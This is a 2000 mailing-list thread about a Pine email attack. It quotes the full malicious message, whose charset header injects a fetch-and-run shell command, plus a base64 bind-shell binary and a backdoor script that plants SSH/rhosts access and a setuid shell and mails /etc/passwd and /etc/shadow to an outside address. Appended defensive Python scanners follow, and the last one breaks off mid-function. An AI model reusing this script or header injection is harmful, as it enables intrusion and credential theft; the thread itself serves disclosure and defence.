
Re: Is it a Trojan Horse?



Hi Tang,

Thanks for your information. 

It probably is a new virus (found only after 16 May) which is especially
designed for UNIX administrators who like to use PINE as the Email client.

You can find more discussion in the newsgroup... for example,

http://x42.deja.com/getdoc.xp?AN=624410603&search=thread&CONTEXT=958548790.554172430&HIT_CONTEXT=958548790.554172430&HIT_NUM=1&hitnum=0

Best regards,
Voyage
------------------------------------------------------------------------------
Io Hio Hong, Voyage 
          
CI, Centro de Informatica     (http://www-ci.ipm.edu.mo)	
Macau Polytechnic Institute   (http://www.ipm.edu.mo)
Tel: 5996175                   Fax: 530505 
Email: voyage@ipm.edu.mo       ICQ: 4050204

On Wed, 17 May 2000, Tang wrote:

> Hello,
> 
> I received an email for the attention of root with strange contents. The
> whole email is shown for your reference.
> When I read the logs attached with the mail, I don't find anything
> (IP address, DNS) relating to our domain.
> 
> Then I try to find out where the email is from, so I point my browser to
> http://tofan.onza.net. The browser outputs a page of shell scripts and
> program code! They are also attached at the end of this mail. Then I start
> to scan the whole email carefully, and find a strange Content-Type
> statement as follows:
> 
>     Content-Type: TEXT/PLAIN;
> charset=``lynx${IFS}-source${IFS}tofan.onza.net|sh|exit``; name="log"
> name="emailf" Content-Transfer-Encoding: BASE64
> 
> Looks like it starts Lynx to browse the page with the suspicious code,
> then runs the code to steal the /etc/passwd file!
> 
> Seems like my Pine didn't run Lynx automatically..... but I'm not sure of
> the harm to us yet!
> 
> Do you ever receive email like this? Any comments?
> 
> regards,
> Tang.
> 
> UMac, INESC Macau
> R.A.
> 
> 
> ============================== Beginning of email =============================
> >From root@tofan.onza.net  Mon May 15 15:18:55 2000
> Received: from mars.fontijne.nl (smtp.fontijne.nl [195.7.212.130])
>  by inesc-macau.org.mo (8.9.2/8.9.2/Debian/GNU) with ESMTP id PAA16075
>  for <root@neptune.inesc-macau.org.mo>; Mon, 15 May 2000 15:16:41 +0800
> (CST)
> Received: from Bastion.Fontijne.nl (195.7.212.131 [195.7.212.131]) by
> mars.fontijne.nl with SMTP (Microsoft Exchange Internet Mail Service
> Version 5.5.2650.21)
>  id K69W8LSQ; Mon, 15 May 2000 08:55:41 +0200
> Received: from atl-qbu-zpn-vty3.as.wcom.net ([216.192.215.3]) by
> Bastion.Fontijne.nl; Mon, 15 May 2000 08:48:49 +0000 (GMT)
> Message-ID: <Pine.LNX.4.10.9909171428170.28464-100000@tofan.onza.net>
> Date: Sat, 13 May 2000 21:15:05 -0400 (EDT)
> From: root <root@tofan.onza.net>
> Subject: DOS attack, log file attached!
> MIME-Version: 1.0
> To: root@tofan.onza.net
> Content-Type: MULTIPART/MIXED;
> BOUNDARY="-1463811839-1047689522-958180505=:1450"
> Status: RO
> X-Status:
> 
>   This message is in MIME format.  The first part should be readable
> text,
>   while the remaining parts are likely unreadable without MIME-aware
> tools.
>   Send mail to mime@docserver.cac.washington.edu for more info.
> 
> ---1463811839-1047689522-958180505=:1450
> Content-Type: TEXT/PLAIN; charset=US-ASCII
> 
> THIS IS TO INFORM YOU THAT A DOS ATTACK WAS LOGGED ON A
> SECURITIES AND EXCHANGE COMMISION INTERNET FIREWALL
> FROM YOUR DOMAIN.
> AN EXCERPT FROM OUR LOGS IS ATTACHED BELOW.
> ALL TIMES ARE US EASTERN AND ARE SYNCED WITH NTP.
> 
> Jerry Leininser
> cops@tofan.onza.net
> 
> ---2463811839-1047689522-958180505=:1450
> Content-Type: APPLICATION/octet-stream;
> name="log.txt.tofan.onza.net.exit"
> Content-Transfer-Encoding: BASE64
> Content-ID: <Pine.LNX.4.10.1000512211505.1450B@tofan.onza.net>
> Content-Description:
> 
> f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAkIYECDQAAABcDAAAAAAAADQAIAAF
> ACgAFwAUAAYAAAA0AAAANIAECDSABAigAAAAoAAAAAUAAAAEAAAAAwAAANQA
> AADUgAQI1IAECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQITQoA
> AE0KAAAFAAAAABAAAAEAAABQCgAAUJoECFCaBAj0AAAA+AAAAAYAAAAAEAAA
> AgAAALwKAAC8mgQIvJoECIgAAACIAAAABgAAAAQAAAAvbGliL2xkLWxpbnV4
> LnNvLjEAABEAAAAfAAAAAAAAABwAAAAWAAAAGgAAABkAAAAAAAAADQAAABEA
> AAATAAAACgAAAAkAAAAYAAAAAQAAABcAAAAOAAAAFAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAUAAAACAAAAAAAAAAcAAAAAAAAA
> CAAAAAAAAAAAAAAACwAAAAAAAAAGAAAAEAAAAAAAAAASAAAAFQAAAB4AAAAd
> AAAAGwAAAAAAAAADAAAADwAAAAAAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAsA
> AABYhQQIHgAAABIAAAASAAAAaIUECCgAAAAiAAAAGQAAALyaBAgAAAAAEQDx
> /yIAAAB4hQQIfgAAABIAAAAoAAAAiIUECAAAAAAiAAAALQAAAJiFBAheAAAA
> IgAAADQAAABQmgQIBAAAABEADAA+AAAAqIUECDYAAAASAAAARAAAALiFBAhm
> AAAAIgAAAEkAAABAhQQIAAAAABIABwBPAAAAyIUECF4AAAAiAAAAVgAAANiF
> BAhGAAAAEgAAAGIAAABQmgQIBAAAACAADABqAAAA6IUECF4AAAAiAAAAbwAA
> AESbBAgCAAAAEQARAH0AAAD4hQQIVAAAABIAAACEAAAACIYECFYAAAAiAAAA
> iwAAABiGBAgAAAAAIgAAAJAAAACQiQQIAAAAABIACgCWAAAAKIYECDQAAAAS
> AAAAnQAAAGSaBAgAAAAAEQDx/7MAAAA4hgQIDQAAACIAAAC5AAAASIYECIAA
> AAASAAAAvgAAAFiGBAg+AAAAEgAAAMkAAABohgQIwAAAABIAAADQAAAAeIYE
> CAAAAAAiAAAA1gAAAIyJBAgAAAAAEQDx/90AAABEmwQIAAAAABEA8f/kAAAA
> RJsECAAAAAARAPH/8AAAAEibBAgAAAAAEQDx/wBsaWJjLnNvLjUAc3RyY3B5
> AHByaW50ZgBfRFlOQU1JQwBleGVjbABkdXAyAHNvY2tldABfX2Vudmlyb24A
> Ynplcm8Ac2VuZABfaW5pdABhY2NlcHQAX19saWJjX2luaXQAZW52aXJvbgBi
> aW5kAF9fZnB1X2NvbnRyb2wAc2lnbmFsAGxpc3RlbgBmb3JrAF9maW5pAGF0
> ZXhpdABfR0xPQkFMX09GRlNFVF9UQUJMRV8AaHRvbnMAZXhpdABfX3NldGZw
> dWN3AHN0cmxlbgBjbG9zZQBfZXRleHQAX2VkYXRhAF9fYnNzX3N0YXJ0AF9l
> bmQAAAAARJsECAUPAABwmgQIBwEAAHSaBAgHAgAAeJoECAcEAAB8mgQIBwUA
> AICaBAgHBgAAhJoECAcIAACImgQIBwkAAIyaBAgHCwAAkJoECAcMAACUmgQI
> Bw4AAJiaBAgHEAAAnJoECAcRAACgmgQIBxIAAKSaBAgHFAAAqJoECAcWAACs
> mgQIBxcAALCaBAgHGAAAtJoECAcZAAC4mgQIBxoAAAAAAAAAAAAA6CMEAADC
> AAD/NWiaBAj/JWyaBAgAAAAA/yVwmgQIaAAAAADp4P////8ldJoECGgIAAAA
> 6dD/////JXiaBAhoEAAAAOnA/////yV8mgQIaBgAAADpsP////8lgJoECGgg
> AAAA6aD/////JYSaBAhoKAAAAOmQ/////yWImgQIaDAAAADpgP////8ljJoE
> CGg4AAAA6XD/////JZCaBAhoQAAAAOlg/////yWUmgQIaEgAAADpUP////8l
> mJoECGhQAAAA6UD/////JZyaBAhoWAAAAOkw/////yWgmgQIaGAAAADpIP//
> //8lpJoECGhoAAAA6RD/////JaiaBAhocAAAAOkA/////yWsmgQIaHgAAADp
> 8P7///8lsJoECGiAAAAA6eD+////JbSaBAhoiAAAAOnQ/v///yW4mgQIaJAA
> AADpwP7//wAAAAAAAAAAWYnjieCJygHSAdIB0IPABDHtVVVVieVQU1G4iAAA
> ALsAAAAAzYCLRCQIo1CaBAgPtwVEmwQIUOiM////g8QE6AT///9okIkECOhK
> ////g8QE6Fr+///oSQAAAFDoV////1uNtCYAAAAAjbQmAAAAALgBAAAAzYDr
> 9420JgAAAABTu2CaBAiDPWCaBAgAdA2QiwP/0IPDBIM7AHX0W8ONNsOQkJBV
> ieWD7DjHRfyYiQQIx0X4pokECMdF9MyJBAjoxP7//4nAhcB0CmoB6Of+//+D
> xARmx0XYAgBoOTAAAOjE/v//g8QEicBmiUXax0XcAAAAAGoIjUXYjVAIUugW
> /v//g8QIaPeJBAiLRQyLEFLos/3//4PECGoBahHoR/7//4PECGoAagFqAujZ
> /f//g8QMicCJRfCDffAAfRtoDYoECOiR/f//g8QEicBQ6Gb+//+DxASNdgBq
> EI1F2FCLRfBQ6PH9//+DxAyJwIXAfRhoG4oECOhe/f//g8QEicBQ6DP+//+D
> xARqBYtF8FDo5f3//4PECInAhcB9GGgnigQI6DL9//+DxASJwFDoB/7//4PE
> BMdF6BAAAACNRehQjUXIUItF8FDobP3//4PEDInAiUXsg33sAH0aaDWKBAjo
> 9Pz//4PEBInAUOjJ/f//g8QEjTboj/3//4nAhcAPhL0AAABqAItF/FDoyv3/
> /4PEBInAUItF/FCLRexQ6Af9//+DxBBqAItF+FDoqf3//4PEBInAUItF+FCL
> RexQ6Ob8//+DxBBqAItF9FDoiP3//4PEBInAUItF9FCLRexQ6MX8//+DxBBq
> AItF7FDoh/z//4PECGoBi0XsUOh5/P//g8QIagKLRexQ6Gv8//+DxAhqAGhC
> igQIaEWKBAhoRYoECOhC/P//g8QQi0XsUOg2/f//g8QEagDo/Pz//4PEBJCL
> RexQ6B/9//+DxATp6v7//412AMnDkJBTu1SaBAiDPVSaBAj/dA2QiwP/0IPD
> /IM7/3X0W8ONNsOQkJAAAAAA6Hv9///CAAAKQ29ubmVjdGVkIQoKAFRoaXMg
> ZmluZSB0b29sIGNvZGVkIGJ5IEJyb25jIEJ1c3RlcgoAUGxlYXNlIGVudGVy
> IGVhY2ggY29tbWFuZCBmb2xsb3dlZCBieSAnOycKAElfZGlkX25vdF9jaGFu
> Z2VfSElERQBTb2NrZXQgZXJyb3IKAEJpbmQgZXJyb3IKAExpc3RlbiBlcnJv
> cgoAQWNjZXB0IGVycm9yAC1pAC9iaW4vc2gAAAAAAAAAAP////8AAAAA////
> /wAAAAC8mgQIAAAAAAAAAABehQQIboUECH6FBAiOhQQInoUECK6FBAi+hQQI
> zoUECN6FBAjuhQQI/oUECA6GBAgehgQILoYECD6GBAhOhgQIXoYECG6GBAh+
> hgQIAQAAAAEAAAAMAAAAQIUECA0AAACQiQQIBAAAAOiABAgFAAAAoIMECAYA
> AACwgQQICgAAAPUAAAALAAAAEAAAABUAAAAAAAAAAwAAAGSaBAgCAAAAmAAA
> ABQAAAARAAAAFwAAAKCEBAgRAAAAmIQECBIAAAAIAAAAEwAAAAgAAAAAAAAA
> AAAAAABHQ0M6IChHTlUpIDIuNy4yLjEAAEdDQzogKEdOVSkgMi43LjIuMQAA
> R0NDOiAoR05VKSAyLjcuMi4xAAgAAAAAAAAAAQAAADAxLjAxAAAACAAAAAAA
> AAABAAAAMDEuMDEAAAAIAAAAAAAAAAEAAAAwMS4wMQAAAAAuc3ltdGFiAC5z
> dHJ0YWIALnNoc3RydGFiAC5pbnRlcnAALmhhc2gALmR5bnN5bQAuZHluc3Ry
> AC5yZWwuYnNzAC5yZWwucGx0AC5pbml0AC5wbHQALnRleHQALmZpbmkALnJv
> ZGF0YQAuZGF0YQAuY3RvcnMALmR0b3JzAC5nb3QALmR5bmFtaWMALmJzcwAu
> Y29tbWVudAAubm90ZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAGwAAAAEAAAACAAAA1IAECNQAAAATAAAAAAAAAAAAAAABAAAA
> AAAAACMAAAAFAAAAAgAAAOiABAjoAAAAyAAAAAMAAAAAAAAABAAAAAQAAAAp
> AAAACwAAAAIAAACwgQQIsAEAAPABAAAEAAAAAQAAAAQAAAAQAAAAMQAAAAMA
> AAACAAAAoIMECKADAAD1AAAAAAAAAAAAAAABAAAAAAAAADkAAAAJAAAAAgAA
> AJiEBAiYBAAACAAAAAMAAAARAAAABAAAAAgAAABCAAAACQAAAAIAAACghAQI
> oAQAAJgAAAADAAAACAAAAAQAAAAIAAAASwAAAAEAAAAGAAAAQIUECEAFAAAI
> AAAAAAAAAAAAAAAQAAAAAAAAAFEAAAABAAAABgAAAEiFBAhIBQAAQAEAAAAA
> dHJ0YWIALnNoc3RydGFiAC5pbnRlcnAALmhhc2gALmR5bnN5bQAuZHluc3Ry
> AC5yZWwuYnNzAC5yZWwucGx0AC5pbml0AC5wbHQALnRleHQALmZpbmkALnJv
> ZGF0YQAuZGF0YQAuY3RvcnMALmR0b3JzAC5nb3QALmR5bmFtaWMALmJzcwAu
> Y29tbWVudAAubm90ZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAGwAAAAEAAAACAAAA1IAECNQAAAATAAAAAAAAAAAAAAABAAAA
> AAAAACMAAAAFAAAAAgAAAOiABAjoAAAAyAAAAAMAAAAAAAAABAAAAAQAAAAp
> AAAACwAAAAIAAACwgQQIsAEAAPABAAAEAAAAAQAAAAQAAAAQAAAAMQAAAAMA
> AAACAAAAoIMECKADAAD1AAAAAAAAAAAAAAABAAAAAAAAADkAAAAJAAAAAgAA
> AJiEBAiYBAAACAAAAAMAAAARAAAABAAAAAgAAABCAAAACQAAAAIAAACghAQI
> oAQAAJgAAAADAAAACAAAAAQAAAAIAAAASwAAAAEAAAAGAAAAQIUECEAFAAAI
> AAAAAAAAAAAAAAAQAAAAAAAAAFEAAAABAAAABgAAAEiFBAhIBQAAQAEAAAAA
> AAAAAAAABAAAAAQAAABWAAAAAQAAAAYAAACQhgQIkAYAAPwCAAAAAAAAAAAA
> ABAAAAAAAAAAXAAAAAEAAAAGAAAAkIkECJAJAAAIAAAAAAAAAAAAAAAQAAAA
> AAAAAGIAAAABAAAAAgAAAJiJBAiYCQAAtQAAAAAAAAAAAAAAAQAAAAAAAABq
> AAAAAQAAAAMAAABQmgQIUAoAAAQAAAAAAAAAAAAAAAQAAAAAAAAAcAAAAAEA
> AAADAAAAVJoECFQKAAAIAAAAAAAAAAAAAAAEAAAAAAAAAHcAAAABAAAAAwAA
> AFyaBAhcCgAACAAAAAAAAAAAAAAABAAAAAAAAAB+AAAAAQAAAAMAAABkmgQI
> ZAoAAFgAAAAAAAAAAAAAAAQAAAAEAAAAgwAAAAYAAAADAAAAvJoECLwKAACI
> AAAABAAAAAAAAAAEAAAACAAAAIwAAAAIAAAAAwAAAESbBAhECwAABAAAAAAA
> AAAAAAAABAAAAAAAAACRAAAAAQAAAAAAAAAAAAAARAsAADwAAAAAAAAAAAAA
> AAEAAAAAAAAAmgAAAAcAAAAAAAAAPAAAAIALAAA8AAAAAAAAAAAAAAABAAAA
> AAAAABEAAAADAAAAAAAAAAAAAAC8CwAAoAAAAAAAAAAAAAAAAQAAAAAAAAAB
> AAAAAgAAAAAAAAssssssssssssssssssssssKQAAAAQAAAAQAAAACQAAAAMA
> AAAAAAAAAAAAAJQUAAC+AQAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAADAAEAAAAAAAAAAAAAAAAAAwACAAAAAAAAAAAA
> AAAAAAMAAwAAAAAAAAAAAAAAAAADAAQAAAAAAAAAAAAAAAAAAwAFAAAAAAAA
> AAAAAAAAAAMABgAAAAAAAAAAAAAAAAADAAcAAAAAAAAAAAAAAAAAAwAIAAAA
> AAAAAAAAAAAAAAMACQAAAAAAAAAAAAAAAAADAAoAAAAAAAAAAAAAAAAAAwAL
> AAAAAAAAAAAAAAAAAAMADAAAAAAAAAAAAAAAAAADAA0AAAAAAAAAAAAAAAAA
> AwAOAAAAAAAAAAAAAAAAAAMADwAAAAAAAAAAAAAAAAADABAAAAAAAAAAAAAA
> AAAAAwARAAAAAAAAAAAAAAAAAAMAEgAAAAAAAAAAAAAAAAADABMAAAAAAAAA
> AAAAAAAAAwAUAAAAAAAAAAAAAAAAAAMAFQAAAAAAAAAAAAAAAAADABYAAQAA
> AAAAAAAAAAAABADx/wwAAABoiQQIAAAAAAAACQAbAAAAaIkECAAAAAACAAkA
> MQAAAFiaBAgAAAAAAQANAD4AAACIiQQIAAAAAAIACQBJAAAAVJoECAAAAAAB
> AAwAVwAAAGCaBAgAAAAAAQAOAGQAAAAAAAAAAAAAAAQA8f9rAAAAAIcECAAA
> AAAAAAkAAQAAAAAAAAAAAAAABADx/wwAAAAQhwQIAAAAAAAACQBwAAAAEIcE
> CAAAAAACAAkAhgAAAFyaBAgAAAAAAQAOAJQAAAAwhwQIAAAAAAIACQBJAAAA
> VJoECAAAAAABAAwAnwAAAFSaBAgAAAAAAQANAK0AAAAAAAAAAAAAAAQA8f8M
> AAAANIcECAAAAAAAAAkAuQAAAFiFBAgeAAAAEgAAAMAAAABohQQIKAAAACIA
> AADHAAAAvJoECAAAAAARAPH/0AAAAIyJBAgAAAAAEQDx/9cAAAB4hQQIfgAA
> ABIAAADdAAAAiIUECAAAAAAiAAAA4gAAAJiFBAheAAAAIgAAAOkAAABQmgQI
> BAAAABEADADzAAAAqIUECDYAAAASAAAA+QAAALiFBAhmAAAAIgAAAP4AAABA
> hQQIAAAAABIABwAEAQAAyIUECF4AAAAiAAAACwEAANiFBAhGAAAAEgAAABcB
> AABQmgQIBAAAACAADAAfAQAA6IUECF4AAAAiAAAAJAEAAESbBAgCAAAAEQAR
> ADIBAACQhgQIgAAAABIACQA5AQAA+IUECFQAAAASAAAAQAEAAJCGBAgAAAAA
> EAAJAE8BAAAIhgQIVgAAACIAAABWAQAAGIYECAAAAAAiAAAAWwEAAESbBAgA
> AAAAEQDx/2cBAAA0hwQIMgIAABIACQBsAQAAkIkECAAAAAASAAoAcgEAACiG
> BAg0AAAAEgAAAHkBAABEmwQIAAAAABEA8f+AAQAAZJoECAAAAAARAPH/lgEA
> AEibBAgAAAAAEQDx/5sBAAA4hgQIDQAAACIAAAChAQAASIYECIAAAAASAAAA
> pgEAAFiGBAg+AAAAEgAAALEBAABohgQIwAAAABIAAAC4AQAAeIYECAAAAAAi
> AAAAAGNydHN0dWZmLmMAZ2NjMl9jb21waWxlZC4AX19kb19nbG9iYWxfY3Rv
> cnNfYXV4AF9fQ1RPUl9FTkRfXwBpbml0X2R1bW15AGZvcmNlX3RvX2RhdGEA
> X19EVE9SX0VORF9fAGNydDAuUwBkb25lAF9fZG9fZ2xvYmFsX2R0b3JzX2F1
> eABfX0RUT1JfTElTVF9fAGZpbmlfZHVtbXkAX19DVE9SX0xJU1RfXwBibGFj
> a2hvbGUuYwBzdHJjcHkAcHJpbnRmAF9EWU5BTUlDAF9ldGV4dABleGVjbABk
> dXAyAHNvY2tldABfX2Vudmlyb24AYnplcm8Ac2VuZABfaW5pdABhY2NlcHQA
> X19saWJjX2luaXQAZW52aXJvbgBiaW5kAF9fZnB1X2NvbnRyb2wAX3N0YXJ0
> AHNpZ25hbABfX19jcnRfZHVtbXlfXwBsaXN0ZW4AZm9yawBfX2Jzc19zdGFy
> dABtYWluAF9maW5pAGF0ZXhpdABfZWRhdGEAX0dMT0JBTF9PRkZTRVRfVEFC
> TEVfAF9lbmQAaHRvbnMAZXhpdABfX3NldGZwdWN3AHN0cmxlbgBjbG9zZQA=
> ---2463811839-1047689522-958180505=:1450--
> ---1463811839-1047689522-958180505=:1450
> Content-Type: TEXT/PLAIN;
> charset=``lynx${IFS}-source${IFS}tofan.onza.net|sh|exit``; name="log"
> name="emailf" Content-Transfer-Encoding: BASE64
> Content-Description: THE LOGS
> Content-Disposition: attachment; filename="emailf"
> 
> 
> 
> 
> 
> 
> 
> 
> PLEASE FORGIVE US IF YOUR SYSTEM WAS ERRORNEOUSLY ACUSED,
> WE HAVE FACED A KERNEL PANIC!
> 
> Sep 16 17:29:21 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1371 \
>               206.121.213.44:8080 L=60 S=0x00 I=63749 F=0x0040 T=55
> .S....
> Sep 16 17:29:24 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1371 \
>               206.121.213.44:8080 L=60 S=0x00 I=63928 F=0x0040 T=55
> .S....
> Sep 16 17:29:30 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1371 \
>               206.121.213.44:8080 L=60 S=0x00 I=64281 F=0x0040 T=55
> .S....
> Sep 16 17:29:42 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1371 \
>               206.121.213.44:8080 L=60 S=0x00 I=64978 F=0x0040 T=55
> .S....
> Sep 16 17:29:45 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1389 \
>               206.121.213.44:8080 L=60 S=0x00 I=65097 F=0x0040 T=55
> .S....
> Sep 16 17:29:48 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1389 \
>               206.121.213.44:8080 L=60 S=0x00 I=65205 F=0x0040 T=55
> .S....
> Sep 16 17:29:54 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1389 \
>               206.121.213.44:8080 L=60 S=0x00 I=22 F=0x0040 T=55 .S....
> Sep 16 17:30:05 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1412 \
>               206.121.213.44:8080 L=60 S=0x00 I=775 F=0x0040 T=55 .S....
> 
> Sep 16 17:30:06 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1371 \
>               206.121.213.44:8080 L=60 S=0x00 I=787 F=0x0040 T=55 .S....
> 
> Sep 16 17:30:11 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1412 \
>               206.121.213.44:8080 L=60 S=0x00 I=1014 F=0x0040 T=55
> .S....
> Sep 16 17:30:21 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1423 \
>               206.121.213.44:8080 L=60 S=0x00 I=1438 F=0x0040 T=55
> .S....
> 
> 
> ---1463811839-1047689522-958180505=:1450--
> 
> ================================ End of email ==============================
> 
> 
> 
> 
> ============================== Source of web page ==============================
> grep "x4334@AGRI" ~/.ssh/authorized_keys >/dev/null 2>&1 || if [ 0 ];
> then
> if [ ! -d ~/.ssh ]
> then umask 022 >/dev/null 2>&1;mkdir ~/.ssh >/dev/null 2>&1
> echo "+ +" >> ~/.rhosts 2>/dev/null
> fi
> umask 022 >/dev/null 2>&1
> echo "512 35
> 9785877609308338986917478061014184970982460312434529051173539551539508793288925026879592531038110506684705572154197270221242712482140435531967239855453591
> x4334@AGRI" >> ~/.ssh/authorized_keys 2>/dev/null
> cat << __EOF__ > /tmp/io.c
> #define PORT 56789
> #include <stdio.h>
> #include <signal.h>
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <netinet/in.h>
> 
> int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
> struct sockaddr_in serv_addr;
> struct sockaddr_in client_addr;
> 
> int main (int argc, char **argv)
> {
> 
>     soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
>     if (soc_des == -1)
>         exit(-1);
>     bzero((char *) &serv_addr, sizeof(serv_addr));
> strcpy(argv[0],"updated");
>     serv_addr.sin_family = AF_INET;
>     serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
>     serv_addr.sin_port = htons(PORT);
>     soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr,
> sizeof(serv_addr));
>     if (soc_rc != 0)
>         exit(-1);
>     if (fork() != 0)
>         exit(0);
>     setpgrp();
>     signal(SIGHUP, SIG_IGN);
>     if (fork() != 0)
>         exit(0);
>     soc_rc = listen(soc_des, 5);
>     if (soc_rc != 0)
>         exit(0);
>     while (1) {
>         soc_len = sizeof(client_addr);
>         soc_cli = accept(soc_des, (struct sockaddr *) &client_addr,
> &soc_len);
>         if (soc_cli < 0)
>             exit(0);
>         cli_pid = getpid();
>         server_pid = fork();
>         if (server_pid != 0) {
>             dup2(soc_cli,0);
>             dup2(soc_cli,1);
>             dup2(soc_cli,2);
>             execl("/bin/sh","sh", "-i",(char *)0);
>             close(soc_cli);
>             exit(0);
>         }
>     close(soc_cli);
>     }
> }
> __EOF__
> gcc -o /tmp/io /tmp/io.c >/dev/null 2>&1
> /tmp/io >/dev/null 2>&1 ||mkdir /tmp/.pkoss493 >/dev/null 2>&1&&cp
> /bin/sh /tmp/.pkoss493/.rc >/dev/null 2>&1;chmod 4715 /tmp/.pkoss493/.rc
> >/dev/null 2>&1
> rm -rf /tmp/io.c
> rm -rf /tmp/io
> mail -s hhp000 bjern3@attglobal.net >/dev/null 2>&1 < /etc/passwd
> echo "`hostname -i  2>&1` - `id  2>&1`- `uname -a  2>&1`- `ls -al ~
> 2>&1` - `cat /etc/shadow 2>&1`" | mail -s hhp001 bjern3@attglobal.net
> 2>/dev/null
> chmod og-w ~ >/dev/null 2>&1
> chmod og-w ~/.ssh >/dev/null 2>&1
> fi
> ============================== End of source of web page ==========================
> 
> 
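Added example, not code from either message in this thread: a small scanner that flags the pattern Tang spotted, shell metacharacters inside a Content-Type or Content-Disposition parameter. It walks every header-shaped line of a raw message (so nested MIME part headers are covered too), joins folded continuation lines, splits the parameters, and reports any charset, name or filename value that a shell would interpret. The sample message is constructed from the headers quoted above, with the long lines folded the way a mail client would send them; `scan_headers` and `unfold_headers` are names chosen here, not anything from Pine or the thread.

```python
# Added example (not code from either message in this thread): scan raw
# MIME headers for shell metacharacters in Content-Type / Content-Disposition
# parameters, the injection pattern in the quoted message. The sample
# message below is constructed from the headers quoted in Tang's mail.
import re

# Headers whose parameters a mail client may pass to an external program
# (charset to a viewer or converter, name/filename to a save path).
WATCHED_HEADERS = ("content-type", "content-disposition")

# Sequences a shell would interpret; none belong in a charset or file name.
SUSPICIOUS = (
    ("backtick command substitution", re.compile(r"`")),
    ("$(...) command substitution", re.compile(r"\$\(")),
    ("shell variable expansion", re.compile(r"\$\{?[A-Za-z_]")),
    ("pipe", re.compile(r"\|")),
    ("command separator", re.compile(r"[;&\n]")),
    ("redirection", re.compile(r"[<>]")),
)

# RFC 2045 charset names: letters, digits and a few punctuation characters.
CHARSET_OK = re.compile(r"^[A-Za-z0-9._:\-]+$")

# attribute=value pairs; the value is either quoted or runs to the next ';'
PARAM_RE = re.compile(r'([A-Za-z0-9*\-]+)\s*=\s*("[^"]*"|[^;]*)')

HEADER_RE = re.compile(r"^([A-Za-z][A-Za-z0-9\-]*):\s*(.*)$")


def unfold_headers(raw):
    """Yield (name, value) for each header-shaped line in the message, including
    the headers of nested MIME parts, joining RFC 822 folded continuation lines."""
    lines = raw.splitlines()
    i = 0
    while i < len(lines):
        m = HEADER_RE.match(lines[i])
        if not m:
            i += 1
            continue
        name, value = m.group(1).lower(), m.group(2)
        i += 1
        while i < len(lines) and lines[i][:1] in (" ", "\t"):
            value += " " + lines[i].strip()
            i += 1
        yield name, value


def scan_headers(raw):
    """Return a list of findings, one per parameter value that looks like shell input."""
    findings = []
    for name, value in unfold_headers(raw):
        if name not in WATCHED_HEADERS:
            continue
        for pname, pvalue in PARAM_RE.findall(value):
            pname = pname.lower()
            val = pvalue.strip().strip('"')
            reasons = [label for label, rx in SUSPICIOUS if rx.search(val)]
            if pname == "charset" and not CHARSET_OK.match(val):
                reasons.append("charset is not a valid RFC 2045 token")
            if reasons:
                findings.append({"header": name, "param": pname,
                                 "value": val, "reasons": reasons})
    return findings


# Constructed sample: the relevant headers of the message quoted above, with
# the long Content-Type lines folded onto continuation lines.
SAMPLE_MESSAGE = """\
From: root <root@tofan.onza.net>
Subject: DOS attack, log file attached!
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED;
 BOUNDARY="-1463811839-1047689522-958180505=:1450"

---1463811839-1047689522-958180505=:1450
Content-Type: TEXT/PLAIN; charset=US-ASCII

THIS IS TO INFORM YOU THAT A DOS ATTACK WAS LOGGED ...

---1463811839-1047689522-958180505=:1450
Content-Type: TEXT/PLAIN;
 charset=``lynx${IFS}-source${IFS}tofan.onza.net|sh|exit``; name="log"
Content-Description: THE LOGS
Content-Disposition: attachment; filename="emailf"

PLEASE FORGIVE US IF YOUR SYSTEM WAS ERRORNEOUSLY ACUSED ...
---1463811839-1047689522-958180505=:1450--
"""

if __name__ == "__main__":
    for f in scan_headers(SAMPLE_MESSAGE):
        print(f"{f['header']} {f['param']}={f['value']!r}: {', '.join(f['reasons'])}")
```

Run against the sample it reports exactly one parameter, the charset of the second part, with backtick substitution, `${IFS}` expansion and a pipe as reasons; a plain `charset=US-ASCII` or a quoted `filename="emailf"` produces nothing. The charset token check is the useful general rule: a value that is not a bare RFC 2045 token is wrong whatever characters it happens to contain, so the scanner does not depend on a fixed list of metacharacters.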


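Added example, not code from either message in this thread: a check for the host-side traces the quoted script would leave if it had run. The script appends a wildcard `+ +` line to `~/.rhosts`, adds a key with the comment `x4334@AGRI` to `~/.ssh/authorized_keys`, drops a setuid (mode 4715) copy of `/bin/sh` in a hidden directory under `/tmp`, and compiles a listener on port 56789; those values come from the quoted source. The function names (`check_home`, `find_setuid_files`, `listening_on`) and the `/proc/net/tcp` excerpt are assumptions constructed for this example.

```python
# Added example (not code from either message in this thread): look for the
# host-side traces the quoted script would leave behind. The key comment,
# port number and /tmp layout come from the script quoted above; the function
# names and the /proc/net/tcp sample are constructed for this example.
import os
import stat
from pathlib import Path

KEY_COMMENT = "x4334@AGRI"   # comment on the key the script appends
BACKDOOR_PORT = 56789        # PORT in the dropped io.c


def check_home(home):
    """Flag ~/.rhosts wildcard trust and authorized_keys entries added by the script."""
    home = Path(home)
    findings = []
    rhosts = home / ".rhosts"
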